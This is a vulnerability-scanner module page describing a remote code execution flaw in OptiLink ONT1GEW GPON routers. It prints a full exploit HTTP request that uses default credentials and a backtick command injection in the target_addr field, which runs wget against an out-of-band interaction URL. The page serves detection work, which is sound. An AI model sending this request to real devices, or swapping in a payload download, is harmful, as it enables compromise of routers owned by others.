Ethical Hacking Automation

Automate Recon and scanning process with Vidoc. All security teams in one place

OptiLink ONT1GEW GPON Remote Code Execution

By kannthu

Critical
Vidoc logoVidoc Module
#optiLink#rce#oast#mirai#packetstorm
Description

What is the "OptiLink ONT1GEW GPON Remote Code Execution?"

The "OptiLink ONT1GEW GPON Remote Code Execution" module is designed to detect a critical vulnerability in the OptiLink software. This vulnerability allows an authenticated, remote attacker to execute arbitrary code on the affected system.

Impact

If successfully exploited, this vulnerability can lead to complete compromise of the affected system. An attacker can execute arbitrary code, potentially gaining unauthorized access, stealing sensitive information, or causing further damage to the system.

How the module works?

The module sends a specific HTTP request to the target system, attempting to exploit the vulnerability. The request is designed to execute a command on the system by leveraging the "POST /boaform/admin/formTracert" endpoint. The payload includes a command injection that allows the attacker to execute arbitrary code.

Here is an example of the HTTP request:

POST /boaform/admin/formTracert HTTP/1.1
Host: <Hostname>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Origin:
Referer: /diag_ping_admin_en.asp
User: e8c
Password: e8c

target_addr="1.1.1.1+`wget+http%3A%2F%2F<InteractionURL>%2F`\"&waninf=127.0.0.1"

The module also includes matching conditions to identify if the vulnerability is present. In this case, it checks for the presence of the "http" protocol in the response, indicating successful exploitation.

This module is critical in identifying systems that are vulnerable to the OptiLink ONT1GEW GPON Remote Code Execution vulnerability, allowing organizations to take appropriate measures to mitigate the risk and protect their systems.

Module preview

Concurrent Requests (1)
1. HTTP Request template
Raw request
Matching conditions
word: http
Passive global matcher
No matching conditions.
On match action
Report vulnerability